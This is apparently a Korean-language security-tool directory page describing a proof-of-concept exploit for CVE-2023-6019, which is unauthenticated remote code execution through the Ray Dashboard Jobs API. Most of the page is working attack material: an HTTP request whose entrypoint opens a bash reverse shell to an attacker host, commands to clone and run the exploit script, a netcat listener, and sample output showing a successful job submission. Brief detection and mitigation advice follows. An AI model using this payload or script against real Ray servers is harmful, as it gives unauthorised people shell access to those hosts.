Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-6019 — CVE-2023-6019에 대한 PoC 익스플로잇 - 인증되지 않은 Ray Dashboard Jobs API를 통한 원격 코드 실행 | Kitploit
도구/GitHubGitHub/joaquinrrr/cve-2023-6019
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubjoaquinrrr/cve-2023-6019

CVE-2023-6019

CVE-2023-6019에 대한 PoC 익스플로잇 - 인증되지 않은 Ray Dashboard Jobs API를 통한 원격 코드 실행

저장소 보기
62개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-6019 - Anyscale Ray Dashboard 미인증 RCE

CVE-2023-6019에 대한 PoC 익스플로잇 — 미인증 Ray Dashboard Jobs API를 통한 원격 코드 실행.
oguiii 제작


설명

Anyscale Ray는 분산 ML/AI 워크로드를 위한 오픈소스 프레임워크입니다. 2.6.4 이전 버전에서는 Ray Dashboard(기본 포트 8265)를 통해 Jobs 제출 API를 인증 없이 노출하여, 인증되지 않은 공격자가 임의의 작업을 제출하고 호스트에서 원격 코드 실행을 달성할 수 있습니다.

  • CVE: CVE-2023-6019
  • 심각도: 치명적 (CVSS 9.8)
  • 영향받는 버전: Ray < 2.6.4
  • 수정된 버전: Ray 2.6.4
  • 공격 경로: 네트워크 (인증되지 않은 HTTP 요청)

작동 원리

/api/jobs/ 엔드포인트는 entrypoint 필드가 포함된 JSON 페이로드를 수락하며, 이 필드는 Ray 워커 프로세스에 의해 셸 명령으로 실행됩니다 — 자격 증명이 필요하지 않습니다.

root@kitploit:~
POST /api/jobs/ HTTP/1.1
Host: <target>:8265
Content-Type: application/json

{
  "entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTACKER/PORT 0>&1'",
  "runtime_env": {},
  "job_id": null,
  "metadata": {}
}

사용법

root@kitploit:~
git clone https://github.com/joaquinrrr/CVE-2023-6019
cd CVE-2023-6019
pip install requests
python3 CVE-2023-6019.py -t <TARGET_IP> -p <PORT> -l <LHOST> -lp <LPORT>

인수

예제

root@kitploit:~
# 리스너 시작
nc -lvnp 4444

# 익스플로잇 실행
python3 CVE-2023-6019.py -t 192.168.1.100 -p 8265 -l 192.168.1.10 -lp 4444

예상 출력

root@kitploit:~
[*] Checking Ray version at 192.168.1.100:8265...
[*] Ray API version : 4
[*] Ray version     : 2.6.3
[+] VULNERABLE! Ray 2.6.3 is affected by CVE-2023-6019

[*] Target        : http://192.168.1.100:8265/api/jobs/
[*] Reverse shell : 192.168.1.10:4444
[*] Submitting job...

[+] Job submitted successfully!
[+] Job ID: raysubmit_Gztg89LZuTa8Jevc

[>] Make sure your listener is ready:
    nc -lvnp 4444

탐지

HTTP 로그나 네트워크 트래픽에서 포트 8265의 /api/jobs/에 대한 예상치 못한 POST 요청을 확인하세요.


완화 조치

  • Ray >= 2.6.4로 업그레이드
  • 방화벽 규칙을 통해 Ray Dashboard 포트(8265)에 대한 액세스 제한
  • Ray Dashboard를 공용 네트워크에 노출하지 마세요

참고 자료

  • https://nvd.nist.gov/vuln/detail/CVE-2023-6019
  • https://www.anyscale.com/
  • https://github.com/ray-project/ray

면책 조항

이 도구는 공인된 침투 테스트 및 교육 목적으로만 사용됩니다.
작성자는 이 도구의 오용이나 이로 인한 손해에 대해 책임지지 않습니다.
테스트를 수행하기 전에 항상 적절한 서면 허가를 받으십시오.

도구 다운로드
플래그설명기본값
-t대상 IP 또는 호스트명필수
-pRay Dashboard 포트8265
-l공격자 IP (리버스 셸)필수
-lp공격자 포트 (리버스 셸)필수